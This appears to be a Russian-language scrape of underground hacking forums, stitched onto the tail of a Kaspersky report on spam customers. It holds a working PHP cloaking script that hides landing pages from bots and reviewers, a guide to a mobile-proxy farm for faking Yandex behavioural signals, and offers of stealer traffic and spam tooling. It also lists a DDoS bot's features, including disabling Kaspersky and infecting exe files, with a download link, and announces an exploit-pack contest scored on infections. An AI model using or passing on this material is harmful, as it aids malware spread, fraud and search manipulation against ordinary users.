звучали приблизительные оценки уровня отклика в 0,01-0,05%. Многие говорили о
том, что трудно выделить вклад спама при использовании нескольких рекламных
каналов.

В целом исследование позволяет сделать несколько выводов.

Во-первых, заказчики спама отдают себе полный отчет в том, что, получив
несколько обращений, они при этом навлекут на себя гнев остальных получателей
рассылки (тысяч и миллионов людей). Компании, прибегающие к спаму, как
правило, очень малы, что позволяет им считать, что такие понятия как репутация
и положительный имидж — не для них.
Во-вторых, стоимость спамерских рассылок очень мала. Однако никто из клиентов
спамеров не может адекватно оценить эффект от проведения рассылок, в т.ч.
возможный отрицательный эффект. Точно так же, заказчики спама не придают
особого значения аудитории, на которую направлены рассылки. Спам заказывается
по принципу «если это так дешево, то почему бы и нет».
В-третьих, для некоторых компаний-респондентов формальный запрет спамерских
рассылок явился причиной, по которой они прекратили заказывать спам. Это
связано как с возможными юридическими рисками, так и с еще большим ущербом для
репутации этих компаний.

В исследовании принимали участие компании, названия которых упоминались в
тексте спамерских сообщений. На основе данных антиспам-подразделения
«Лаборатории Касперского» был составлен список из 500 таких компаний.
Пропорции отбора будущих респондентов по сферам деятельности были выдержаны в
соответствии с пропорциями различных тематики спама в Рунете. Больше всего
заказчиков спама приходится на компании, работающие в сфере туризма и отдыха
(14%), предоставляющие услуги по ремонту и переездам (9,3%) и занимающиеся
полиграфией (7%). Были учтены и другие, менее распространенные категории.

Интересно, что социологический опрос проводился анонимно, с помощью весьма
оригинальной методики. Заказчику спама звонил «сотрудник небольшой компании»,
который якобы тоже хотел заказать спамерскую рассылку и спрашивал у «коллег»
совета. Конечно, такую методику не назовешь научной, но в данном случае трудно
было придумать что-нибудь лучше.

_Источник: 878898f32a12ef6f625d6317feb174de_

Доброго времени суток, пока у меня есть свободное время
думаю помочь начинающим или уже людям которые заливались с фб
отвечу в этой теме на любой вопрос по фб знаю как;
Фармить аккаунты
Как вязать карты
Как пустить траф на стиллер
Где искать креативы
Как правильно запустить компанию
Какие аккаунты брать
Как сделать качественные крео и прочее...
В лс не отвечаю, отвечаю только тут чтобы не было повторения вопросов

ребят , привет! я новичок !хочу приобрести хороший софт для спама имэил ,
рассмотрю любые предложения ))))

You must have at least 5 message(s) to view the content.

Всем привет, часто начал замечать, что сейчас массово покупают аккаунты
Reddit. Может кто знает, насколько сложно там запустить рекламную кампанию или
как там все устроено. По моему оферу Google ADS вообще не дает установок,
поэтому решил узнать за Reddit.

Помню был топик, где народ изъявил желание создать сеть для распределенных
вычислений (брут MD5 и др.). В общем, щас решил заняться созданием данной
сети, пока что ваяю каркас. Отписываемся сюда, какие функции в ней хотим
видеть. И т.д., мнения пожелания, нужна ли вообще эта сеть и т.д.

Дубль темы с експы/topic/179960/


Имею многолетний опыт в теории со времен славпоха и его клоаки, олды поймут. В
практике с год уже.
Отвечу на вопросы новичков так же буду рад пообщаться с олдами.
Клоаку рекомендую Hide.click ( не реклама ) на дамаге есть мой топик о том как
клоачить ищи в разделе фишинг.

Погнали.

**Part I [ Создание инфраструктуры под накрутку ПФ ]
**

> Здравствуйте, Господа. Вот и настал тот день когда все светочи нашей команды
> собрались и наконец то выкатили сео "монстра" для накрутки поведенческих
> факторов. В данный момент - вся наша кухня проходит тестирование, есть ряд
> задач и проблем - решения которых мы опишем в продолжении этих статей.
>
> Click to expand...


С Вами на связи **Azcord** и мы начинаем

**Что такое поведенческие факторы:**

Начнем мы эту историю из далека - какого черта нас вообще интересуют ПФ и что
это вообще такое? Просвещенные сразу могут пролистать эту часть статьи, но мне
ведь нужно как-то подвести повествование к практической части.
И так, ПФ - що это? Поведенческие факторы есть — удовлетворенность
информацией, совокупность положительных/отрицательных паттернов поведения
пользователя на поисковой выдачи, так и внутри конкретного сайта. Исходя из
этого, мы можем прийти к умозаключению, что эти паттерны можно накручивать и в
теории достаточно легко. Почему?
Яндекс - это про деньги. И это отличные новости.


* "Что бы все это дело фильтровать нужны ресурсы, которых Яндекс - не хочет выделять."


Поведенческие факторы имеют очень много системного шума.


* "Человек в сущности - существо иррациональное и в каждом отдельном случае пользователь является уникальным."

Основным фактором ранжирования в Яндексе сейчас есть — ПФ


* "Инженеры яндекса сами в открытую об этом говорят."

Раз ситуация выглядит таким образом, грешно этим не пользоваться, не так ли?


> Ведь поисковая система заинтересована в удовлетворенности пользователей от
> результата поиска и ранжирует веб-страницы таким образом, чтобы
> удовлетворенность постоянно росла.
>
> Click to expand...


Окей, нам нужно понять от куда Яндекс подсасывает информацию?

**Есть три основных источника** , но стоит понимать, что это далеко не все.
Поисковик учитывает все сигналы которые может извлечь из поведения. Сейчас же
остановимся на трех основных, а остальные будем изучать в процессе тестов.

**1\. Поисковая выдача ( результаты поиска )**
Любая поисковая система следит за своей выдачей, она наблюдает за тем, куда мы
переходим, как долго задерживаемся на странице, как мы вводим мышкой и т.д всю
эту информацию она собирает из результатов поиска.

**2\. Браузеры**
В пример возьмем гугл. У гугла есть браузер хром, а еще у гугла есть платформа
андроид, и уже давно не секрет, что гугл за нами следит. Всю информацию с этих
источников, уходить напрямую в дата центры.

**3\. Сервисы веб-аналитики и прочие**
Тут все просто, Яндекс-метрика - внутри которой есть свой антифрод, а на
поисковой выдачи свой. Сюда бы я еще вписал остальные сервисы яндекс,
например: Яндекс Карты, Яндекс бизнес.

Ага, это мы выяснили. Следствие - мы можем разделить ПФ условно на две
составляющие:

**Внешние факторы:
CTR — показатель кликабельности**
Идея примитивная до жути, нам нужно чтобы пользователь кликал на сайт.
Останавливаться на идеях расширенного Featured Snippet, проработке description
и погрузки адекватного favicon - оставим
**Длина клика —** показатель оценивающий время между переходом на страницу и
возвращением в поисковую выдачу.
**Показатель страниц** открытых в одном сеансе — количество открытых страниц в
одном сеансе.
**Последний клик —** показатель завершенности поисковой сессии.
( Этот пункт по моему субъективному мнению где-то посередине, его как и все
остальные мы рассмотрим подробнее в процессе тестов )

**Внутренние факторы:
Длительность сеанса —** время проведенное на сайте.
**Показатель отказов —** кол-во пользователей покинувшие страницу.
**Глубина перехода —** количество открытых страниц внутри сайта.
**Конверсионные действия —** не требует пояснений

Наверняка есть и другие факторы которые я упустил на сегодня из виду, ну что
же, будем изучать это дерьмо в режиме реального времени. Собственно факторы
описанные выше мы и будем крутить.

**Что нам для этого потребуется?**

**1\. Нам нужен софт** , на сейчас у меня есть три варианта которые я выделил
для себя. Два из которых написаны на BAS ( кому-то жаль тех кто крутит на
басе, правда никто толком не говорит почему, добре, мы это выясним на практике
)

**Список:**

WebVisiter
\- Только ленивый про него не знает, купить можно здесь:
<https://t.me/arxatpro>

RedBull
\- Менее известный, но так же можно найти в паблике ( начнем с него )
Поделюсь ссылкой с разрешения разраба.

Termidroid Network
\- Привлек мое внимание, подробности можно изучить здесь:
https://************/discussion/thr...pf-do-20-vizitov-besplatno-
ezhednevno.104189/

**Для начала пойдет, едем дальше

2\. Нам необходимо железо на которое мы поставил софтину.**
Тут есть три очевидных варианта:

* **Арендовать сервер**

-Минимальные системные требования для более менее комфортной работы:


В общем дороговато, не так ли? Так или иначе сервак с подобными
характеристиками можно найти в пределах 150-200$. А то и лучше по
характеристикам.

Примерная цена за характеристики нашего сервера:
Это вообще пиздец...


Купить север/заказать сервер
\- Есть вас не пугают космические цены-это вполне приемлемый вариант,
стукнется вам это счастье примерно в 3000-4000$


* **Собрать свой сервер**

Что нам может предложить рынок? В целом у нас есть два варианта:
Алиэкспресс
Плюсы:
\- достаточно демократичные цены
\- большой выбор
Минусы:
\- очень долгая доставка (1-2 месяца)
\- если придет брак, то это снова тратить большое количество времени на
возврат/замену


* **Купить все в специализированных магазинов и частников**

Плюсы:
\- можно купить и все собрать за пару дней
\- какие никакие гарантии, если покупаете что то в магазине

Минусы:
\- очень скудный выбор, серверное оборудование не купишь в ближайшем днс,
нужно искать специализированные магазины, что не в каждом городе есть, либо же
прочесывать авито в поисках удачных вариантов (Кстати б/у процы и оперативки
можно смело брать, если они не перегревались (что в принципе очень сложно
сделать), то они в полном порядке, все это дело необходимо проверить через тот
же memtest или аиду)
\- ну и самый главный минус, вытекающий из первого - цена (в магазинах все
комплектующие с али будут раза в 1,5 дороже)

**Мы решили собирать свой сервак:**

1\. Процессор - забываем сразу же про типичные интел и райзен из днс (для
наших целей цена не оправдано высока), самое главное, нам важно количество
физических ядер и потоков, чем больше тем лучше, на частоту процессора нам
фиолетово, т.к. программы наши требуют именно многопоточность, рендирингом
видосов мы не собираемся заниматься
Хороший выбор будет в пользу E52696v3/4

[ https://aliexpress.ru/wholesale?SearchText=Xeon+2696
](https://aliexpress.ru/wholesale?SearchText=Xeon+2696)

Цена: 12-20к x 2 = 24-40к

2\. Материнская плата - под наши процы берем двухпроцессорную материнку на
сокете LGA2011
Выбор пал в сторону MACHINIST X99 D8, так как нашел несколько сборок сервака с
хорошими отзывами именно на ней

[ https://aliexpress.ru/wholesale?SearchText=MACHINIST+X99+D8
](https://aliexpress.ru/wholesale?SearchText=MACHINIST+X99+D8)

Цена: 12-20к


> Как сказал знакомый сис админ главное обратить внимание на конденсаторы
> проца, чтоб они не перегревались, хорошо так же зайдет в сборку платы от
> supermicro, но их еще нужно найти
> Так же нужно не подъебаться с размером корпуса для нее, размер платы EATX -
> влезет далеко не в каждый корпус, а если и влезет могут не сойтись отверстия
> для крепления. Нашел на авито старенький, но хороший Thermaltake tai-chi
> Цена: 10к
>
> Click to expand...


3\. Оперативная память - решили брать сразу с запасом 256гб серверную память
от самсунга

[ https://aliexpress.ru/item/4000770450335.html?sku_id=12000022479258044
](https://aliexpress.ru/item/4000770450335.html?sku_id=12000022479258044)

Взяли 8 плашек по 32гб с частотой 2133
Цена: 30к

4\. SSD - берем чисто под систему и важные проги 500гб

[ https://aliexpress.ru/item/1005003677576454.html?sku_id=12000028078678061
](https://aliexpress.ru/item/1005003677576454.html?sku_id=12000028078678061)

Цена: 6к

5\. Жесткий диск - в зависимости от ваших потребностей выбирать объем.
Мы взяли два серверных по 16тб

[ https://aliexpress.ru/item/1005004526810186.html?sku_id=12000029479594581
](https://aliexpress.ru/item/1005004526810186.html?sku_id=12000029479594581)

Цена: 45к

6\. Процессорный куллер
<https://aliexpress.ru/item/1005002366025350.html?sku_id=12000029400957896>
Цена: 3-6к

7\. Блок питания - выбираем хороший, с запасом, чтоб он не работал постоянно
на 100%, мы взяли голдовский deepcool на 800 Ватт в ближайшем ДНС
Самое главное, у нас двух процессорная мать, а значит должно быть два питания
на процессор и смотрим длину кабеля, который идет на проц, он не всегда может
дотянутся и придется покупать переходник
Цена: 9-10к

8\. Видеокарта - берем какую нибудь затычку с авито
Цена: 2к


> После того, как приобрели все комплектующие - собрали, в этом ничего
> сложного, в интернете полно доступных мануалов, в крайнем случае любой
> мастер вам соберет за условные 50-100$
> У нас при сборке единственная трудность возникла в том, что пк не включался
> и все время ругался на память, но в итоге запустился, как позже выяснили
> методом тыка, у нас не стабильно работала одна плашка памяти.
> Устанавливаем винду, серверную или 10 pro, ниже не имеет смысла ставить,
> так как не будет поддерживать два проца, к 10 кстати тоже можно удаленно
> подключаться.
> Так как мы не электрики, то решили обезопасить себя по максимуму, взяли еще
> ИБП (источник бесперебойного питания), в случае замыкания можно будет не
> беспокоится о всем подключенном оборудовании к нему, так же у него есть
> аккумуляторы, если произойдет отключение электричества у вас будет время на
> корректное закрытие софта и сохранение данных
> Цена: 30к
>
> Click to expand...


К нашему ИБП воткнули еще сетевой фильтр, на всякий случай

**Общая сумма: где-то 2к баксов вместе со всеми комплектующими. Короче
3\. Создание прокси фермы**
Немного математики:
1 мобильная прокся ( приват ) стоит 2500 - да еще не факт, что она приватная,
но это уже другая история. Исходя из характеристик сервера мы можем
расчитывать минимум на 100 проксей. 100 x 2500 = 250к в месяц, четверть
ляма...
К этому мы условно еще можем прибавить кэш за аренду сервера в 60-70к...
Не комильфо, а если откровенно - это пиздец. Как вы уже поняли, по 320к/месяц
платить я не хочу. Что делать? Собрать свою прокси ферму. О_о да, у кого-то
будет секс.

**Начинаем изучать тему, что нам потребуется?**

1\. Нам нужен еще один сервачек на которым будет развернута сеть. Здесь в
целом ничего критичного, по этому купим какую-нибудь залупу под тесты на авито
в приделах 150-200$ с следующими характеристиками:
Минимум проц с 6 физическими ядрами + 6 виртуальных
Оперативы гигов 8-16 ГБ


Тут мы его немного апгрейдили, но в целом ничего интересного. К серваку
который держит ферму так же был докуплен ИПБ.

2\. Далее нам нужны прошитые модемы. Мое зоркий глаз остановился на модемах
хуевей е3372 и

хуевей е3372 - 30шт по 2500 = 75к
хуевей е3376 - 30шт по 1500 = 45к

Итог на модемы ушло: 120000р

3\. В модемах как вы, наверное, догадались должны находиться симки.
Под модемы я нашел 30 симок стоимостью 1200р x 30 = 36000р ( оператора
оставить за кулисами ) с безлимитным интернетом 250р/месяц
Дополнительно были закуплены еще два оператора по 15шт с стоимость 500р, 500 x
30 = 15000р с безлимитным интернетом в 500-550р/месяц
А теперь посчитаем сколько стоит в прокся при наличии фермы 22 - 25к за ферму
в 60 портов, черт с ним когда увеличим кол-во проксей до 100 эта сумма будет
едва ли доходит до 35к/месяц. 35к рублей даже близко не стоит рядом с 250к...

4\. Ах да, модемы же нужно куда-то вставлять.
Поэтому заранее был куплен хаб на 30портов ORICO вместе со всем железом. За
10к, от которого в последствии пришлось избавиться и заменить на SIpolar на 20
портов каждый.
\- Приобрел 3 хаба Sipolar на 20 портов по 100$ за каждый. 300$


5\. Далее на всех модемах нужно поменять Ip по типу 144.75.*.100, заместо
звездочки любое число, главное, чтобы у каждого модема оно было уникальное и
настроить ротацию

Ну и здесь началась ебля... Именно на процессе настройки фермы
очень долго ебались , так как во всех мануалах в интернете рекомендуют
программу 3proxy, то пытались сначала ее установить, далее нормально настроить
ротацию ip.

В итоге угробив несколько недель и денег на проггера, который даже в один
момент предложил уже тупо написать свой скрипт, на выходе мы нашли два готовых
варианта:

1) <https://bablosoft.com/shop/SwitchStation> \- скрипт на две машины с
максимальным кол-ом подключений 20 устройств.

2) <https://kraken-proxy.ru/> \- этот вариант оказался более лояльный, итог мы
взяли его.

Программа максимально понятная, есть мануалы по настройке модемов, есть
саппорт, честно говоря который не особо сговорчив, даже за денюжку
В целом достаточно установить прогу на убунту, зайти, создать и настроить
“профили модемов”, после уже на них поднимать прокся.

Сейчас будет небольшая выжимка информации и советов, расскажу про трудности, и
проблемы на решение которых у нас ушли месяцы.

1\. Не берите хаб orico, есть свои проблемы с питанием и портами, долго
выявляли эту проблему, заменили его на промышленный хаб Sipolar на 20 портов,
теперь все четко.


Чтобы модемы не наебнусь быстро, рекомендую снимать корпуса и ставить все это
дело под кондер. В общем обеспечить необходимую температуру. У нас на данном
момент ферма расположена в неотапливаемом помещении, на сегодня не паримся по
этому направлению, но скоро....

\- так же сигнал могут улучшить специальные антенны для модемов, после
подключения качество сигнала улучшилось более чем.


Далее

\- поменять прошивку модема, нам это очень помогло, сигнал с одной красной
полоски вырос до стабильных 3-4

До смены прошивки


После смены прошивки


Теперь вернемся к проблемам который нам пока не удалось решить.

1\. Отваливаются модемы, есть две гипотезы почему так происходит:
А. Есть просадка напряжения по всему дому... Следствие - ферме не хватает
питания и модемы отлетают как семечки. Из 30 подключенных модемов, стабильно
работают 24.
Б. Мать сервера которая обеспечивает работу ферме не вывозит такое кол-ви
активных USB подключений. Соответственно модемы отваливаются.

В целом, осталось надеть только носки.... И все запуститься, тестирование
прошло +- успешно за исключением, полной реализации всей доступной мощности...

Большой материал для новичков и для тех, кто уже имеет представление о том,
что такое дорвеи и хочет улучшить свои результаты.
Огромное количество полезного материала под CPA ниши.

**Содержание мануала:

⦿ Выбор вертикали (дейтинг, гэмблинг, адалт и тд);
⦿ Сбор ключевых фраз (даются разные базы);
⦿ Создание дорвеев, изучение доргенов;
⦿ Индексация страниц;
⦿ Наставления и рекомендации.


You must have at least 1 reaction(s) to view the content.

**

**Здарова уже любимые форумчане)) почему уже? да потомучто я не так уж долго
тут зарегистрирован)**


Сидел тут и гулял по интернету и от безделья решил сделать что то полезное для
своих дамаглабцев)))

Долго и не грамотно писать не буду))))


Так вот

Нынче найти живой траффик это проблема , многие льют с бирж многие льют с
шелов , кстати счас вы скажете да ну накуй эти биржы там одно г*вно , вы почти
правы , так вот с шелов трафф нормальный получается , а что делать нам если мы
не умеем ломать сайты и заливать шелы ?
\- Читать дальше статью))))))))))))


Вообщем то что я предлагаю это вместо шелов купить сами сайты с траффиком....
Ведь шелы при не грамотном использовании могут уплыть далеко далеко))))


Spoiler: 200

**1.** Идем на godaddy
**2.** Domains
**3.** Browse Auctions
**4.** Popular Searches - A-Z listings
**5.** Sort By - All listings
**6.** Жмем на Traffic Внизу( получаем список доменов по убыванию траффика )

Покупаем например домен avos.info за 250 $ , паркуем где нибудь , вешаем фрейм
и льем, на домене 94к траффика по данным godaddy

Итог

Получилось что мы купили 94к траффика за 250 баксов .... льем траффик пока не
уложим домен в листы АВ =)

Создать 2 файла:
index.php

PHP:Copy to clipboard



<?php

error_reporting(0);

### CONFIG ###
$CHECK_IPS_KEY = "key_free";
$work = 1; # 1 - ON / 0 - OFF, all send bad_reguest
$good_url = "http://www.google.com/"; # URL send OK
##############

###
function good_reguest($good_url){
header('Location: '.$good_url);
exit();
}
#
function bad_reguest(){
include "bad_reguest.php";
exit();
}
###

###
if($work == 0){
bad_reguest();
exit();
}
###

###
$GLOBAL_IP = $_SERVER['REMOTE_ADDR'];
$GLOBAL_UA = urlencode($_SERVER['HTTP_USER_AGENT']);
#
$CHECK_IPS_KEY = "key_free";
$CHECK_IPS_API_BOT = "http://checkbot.check-ips.net/".$CHECK_IPS_KEY."/ip/".$GLOBAL_IP;
###

if( ### Check USER_AGENT

strpos($GLOBAL_UA, urlencode('http://')) !== false ||
strpos($GLOBAL_UA, urlencode('Catchpoint')) !== false ||
strpos($GLOBAL_UA, urlencode('Python')) !== false ||
strpos($GLOBAL_UA, urlencode('Crawler')) !== false ||
strpos($GLOBAL_UA, urlencode('Spider')) !== false ||
strpos($GLOBAL_UA, urlencode('crawler')) !== false ||
strpos($GLOBAL_UA, urlencode('spider')) !== false ||
strpos($GLOBAL_UA, urlencode('Bot')) !== false ||
strpos($GLOBAL_UA, urlencode('BOT')) !== false ||
strpos($GLOBAL_UA, urlencode('bot')) !== false ||
strpos($GLOBAL_UA, urlencode('ips-agent')) !== false ||
strpos($GLOBAL_UA, urlencode('zgrab')) !== false ||
strpos($GLOBAL_UA, urlencode('Netcraft')) !== false ||
strpos($GLOBAL_UA, urlencode('BingPreview')) !== false ||
strpos($GLOBAL_UA, urlencode('evc-batch')) !== false ||
strpos($GLOBAL_UA, urlencode('Wget')) !== false ||
strpos($GLOBAL_UA, urlencode('CheckHost')) !== false ||
strpos($GLOBAL_UA, urlencode('HostTracker')) !== false ||
strpos($GLOBAL_UA, urlencode('Wappalyzer')) !== false ||
strpos($GLOBAL_UA, urlencode('Hstpnetwork')) !== false ||
strpos($GLOBAL_UA, urlencode('Genieo')) !== false ||
strpos($GLOBAL_UA, urlencode('Yahoo')) !== false ||
strpos($GLOBAL_UA, urlencode('A6-Indexer')) !== false ||
strpos($GLOBAL_UA, urlencode('Windows NT 5.2')) !== false
#ADD MORE

){
bad_reguest();
} else {

if ( ### Check CHECK_IPS_API_BOT
strpos(file_get_contents($CHECK_IPS_API_BOT), 'BOT') !== false
){
bad_reguest();
} else {
good_reguest($good_url);
}

}

exit();

?>

bad_reguest.php (сюда можно положить оригинальный код вашего лендинга для
аппрува, дефолт код ниже)

PHP:Copy to clipboard



<?php
header("HTTP/1.0 404 Not Found");
echo "404 Not Found";
?>



Сделано на CHECK-IPS.NET - IPs-Data API

<https://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion/threads/35253/>

Тестил ддос бота Illusion на днях. Почему после определенного времени
пребывания ботов в он-лайне, они уходят в офф,несмотря на то,что сам комп на
котором они висят по-прежнем находятся в инете? От чего зависит время ухода
ботов в офф? У кого такое было?

Возможности:
1\. Пинг, Урл ддос. Последнюю можно юзать для накрутки трафика.
2\. Назначение бботам отдельных заданий
3\. Обход файрвола через доверенный процесс - svchost.exe(по умолчанию)
4\. Многопоточность.
5\. Невидимость в процессах.
6\. Нестандартная автозагрузка.
7\. Закачка файлов.
8\. У каждого бота свой уникальный ключ. Который можно изменить при
форсированной перерегистрации.
9\. Установка выбранного вами файла на ддос серверы.
10\. Выполнение команд.
11\. Посылка сообщения.
12\. Заражение exe фалйлов
13\. Убивать злые процессы
14\. Убивать каспера
15\. Убивать не нужные сервисы
16\. Рассылка по найденным емейлам
17\. Если его потерут из реестра то он автоматом прописывается в
реестре(проверка каждые 10 секунд)
18\. Все это в 13 килобайтах.

Spoiler: 3 у вас 43

[Скачать|Download](http://xss.is/dl/virus/DDos_by_Loader.rar)

Ранее сабж продавался по 300 баков. Давали мне на проверку когда-то демку. Щас
смотрю в пабл попал.

Год назад работал небольшой командой (3 человека) по буржу в теме емейл спама.
Сами добывали базы, слали по ним, траф монетизировали партнерками.
В откровенную чернуху не лезли принципиально, хотя со многим знакомы.
В основном работали под бинарку.


Чуть позже, из-за разногласий развалилилсь, а знания и софтец для всего этого
- остались.

К чему это я..


Могу в этом топике отвечать на вопросы связанные с емейл спамом, добычей
качественных емейл баз,
добычей smtp корпов и последующей монетизацией трафика, если эта тема кому-то
интересна.

Не обещаю, что отвечать буду быстро.



Если кто-то захочет ознакомиться более детально с этой темой - можете писать в
ЛС или жабу:
[agrex@exploit.im](mailto:agrex@exploit.im)
[smtpspam@shangryla.net](mailto:smtpspam@shangryla.net)

Сидел и вспоминал как это правильно делается.
Вообщем суть. Есть iframe вида

Code:Copy to clipboard



<iframe src="http://site.ru/tds/image.jpg" hspace="0" vspace="0" frameborder="0" border="0" framespacing="0" marginwidth="0" marginheight="0" style="border-style: solid; border-width: 0px; width: 100%; height: 100%" width="100%" height="100%"></iframe>


По адресу <http://site.ru/tds/image.jpg> лежит обычный php файл. Нужно было
что-то прописать вроде в .htaccess чтобы jpg обрабатывался как php. НО нужно
чтобы это правило действовало только в этой папке и не распространялось на
вложенные, где лежит сам шаблон tds.
Кто напомнит подробности - с меня **+**

Спасибо.

​

Всем авторам связок предлагается принять участие в сравнительном обзоре на
звание самой лучшей связки.

Ваши связки будут оцениваться мной (**Ar3s**) и **DeusTirael**.
Критерии оценки:
1\. Простота установки
2\. Функционал
3\. Удобство интерфейса
4\. Пробив (тесты всех связок пройдут на одинаковом трафике)
5\. Отстук (будем сравнивать количество пробитых машин и количество
отстучавшихся ботов. Прогружаемый файл для всех связок одинаков.)
6\. Качество кода (Проводит DeusTirael. Сравнивается точность подсчета
пробитых машин, количество выявленных косяков о коду, будет произведена
публикация выявленных косяков, после уведомления о них авторов и пары дней
ожидания на их исправление, или рапорта автора о устранении косяка.)
7\. Качество крипта. (Virtest)

Для участия в конкурсе вы должны предоставить нам рабочую версию связки,
запрещается использование ионкубера или иных подобных обфускаторов. В случае
несогласия автора с изучением исходников будут рассматриваться варианты приема
на конкурс связок "под обфускатором", но с условием, что никакие действия по
изучению кода производиться не будут и об этом будет указано в финальной
таблице.
Кроме того, нам потребуется проверить вашу связку на чистоту выдачи. Поэтому
участие авторов в данном нюансе приветствуется. Нам никоим образом не хочется
самолично вносить изменения в работу системы.

Я гарантирую всем авторам, что кроме меня и DeusTirael ваши детища никто не
увидит. Ни исходников, ни систем "в работе". В финальном обзоре будут лишь
скриншоты и ссылки на результат АВ проверки.
Так же приветствуется внедрение в тело связки нестандартной переменной,
которая будет лишь в выданном мне варианте связки. Дабы вы в случае "утечки"
были уверены, что это произошло не по нашей вине.

Последний срок приема заявок - **22 сентября 2009 года**.

Любые предложение по данному обзору - приветствуются. Все обсуждения будут
абсолютно прозрачны, дабы меня не обвиняли в предвзятом отношении к кому-
нибудь.